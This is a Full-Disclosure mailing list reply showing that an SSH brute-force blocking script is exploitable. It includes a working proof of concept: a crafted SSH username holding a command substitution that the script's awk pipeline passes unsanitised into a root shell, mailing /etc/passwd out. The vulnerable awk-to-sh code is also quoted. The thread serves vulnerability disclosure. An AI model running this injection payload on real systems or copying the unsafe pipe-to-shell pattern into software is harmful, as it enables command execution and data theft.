Re: SSH brute force blocking tool

[Tavis Ormandy <taviso () gentoo org>]

On Tue, Nov 28, 2006 at 09:33:03AM -0500, J. Oquendo wrote:
> Thierry Zoller wrote:
> > Dear All,
> >
> > You are arguing over hypothesises where facts could rule. PLEASE someone
> > just setup the script on a test environment and present us your
> > results. Heck, it's not that we are discussing Metaproblems here,
> > these are computers.
> >
> > Just install and make a PoC and enhance security for all
> > for the sake of it. Thanks :)

Out of interest, I did just that. It turns out to be quite tricky to get
arbitrary shell commands in there as (at least on my system), ssh will
stop logging usernames after certain characters are encountered, such as
'/' or ':'.

However, it is certainly possible. Here is an example.

#!/bin/sh
command='$(x=$(pwd|head${IFS}-c1);$(cat<<<mail${IFS}full-disclosure () lists grok org uk)<${x}etc${x}passwd)'
ssh -o "BatchMode yes" "a a $command"@$1

Which produces log entries like this:
 
Nov 28 15:14:15 insomniac sshd[5897]: pam_succeed_if(sshd:auth): error retrieving information about user a a 
$(x=$(pwd|head${IFS}-c1);$(cat<<<mail${IFS}full-disclosure () lists grok org uk)<${x}etc${x}passwd)
Nov 28 15:14:15 insomniac sshd[5897]: Failed password for invalid user a a 
$(x=$(pwd|head${IFS}-c1);$(cat<<<mail${IFS}full-disclosure () lists grok org uk)<${x}etc${x}passwd) from 127.0.0.1 port 
47403 ssh2

Note that the 13th field both contains a dot and is entirely controlled
by me. This string is placed in /etc/hosts.deny by the script after
executed by cron.

The $1 in the awk script below is the entire string, which is piped
unsanitised into /bin/sh:

awk '!/#/ && /\./ && !a[$0]++
{print "iptables -A INPUT -s "$1" -i eth0 -d '$ifaddr' -p TCP --dport 22
-j REJECT"}' /etc/hosts.deny |\
awk '/iptables/ && !/#/ && !/-s  -i/'|sh

The results are obvious.

> The problem with the whole thread was "well someone could do XXX" Sure 
> they could... Anyone could... My point was someone shooting a message 
> back to the list stating "Your program is a backdoor".

Yes, I wrongly assumed you had malicious intentions, but are actually
just an inexperienced programmer. I apologise for this.

> It never was and 
> it never will be. Can someone modify it on their own and make it a 
> backdoor? Sure. Can someone inject something into the columns I was 
> parsing, possible. Anything is possible. Since then I re-wrote arguments 
> people were griping about:

Yes, although your code is still very fragile and relies on unique
strings appearing in the logs. I certainly wouldnt want all that extra
code running as root on untrusted input.

> ifaddr=`ifconfig -a|awk '/inet/ && !/inet6/ && !/127.0/ && 
> !/192.168/{print $2}'|sed 's/addr\://g'`
>
> function IPT {
>
> grep -E 
> '(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[1-9])(\.(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[0-9])){3}' 
> /etc/hosts.deny|\
> awk '!/#/&&/\./&&!a[$0]++
> {print "iptables -A INPUT -s "$1" -i eth0 -d '$ifaddr' -p TCP --dport 22 
> -j REJECT"}'|\
> awk '/iptables/&&!/#/&&!/-s  -i/'|sh
>
> }

You also still havnt solved the problem of an attacker adding arbitrary
addressed to hosts.deny.

> The complaint was "anyone can insert $foo into the thirteenth column"... 
> Try it instead of mouthing off about it. "Someone can possible inject 
> tartar sauce into a sealed jar" Is it possible, sure it probably is, 
> show me though instead of yapping off. Someone else griped, "someone can 
> craftily insert your own address into an IP table." Look if someone is 
> THAT stupid of an admin to not test things first, modify it to their 
> needs, and gets themselves locked out of their own machine, they have no 
> business on that machine. Period.

J, what would testing achieve? An attacker simply needs to know an
important address to block. Your code is very naive and fragile, and
should be avoided.

Thanks, Tavis.

-- 
-------------------------------------
taviso () sdf lonestar org | finger me for my pgp key.
-------------------------------------------------------

Attachment: _bin
Description:

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/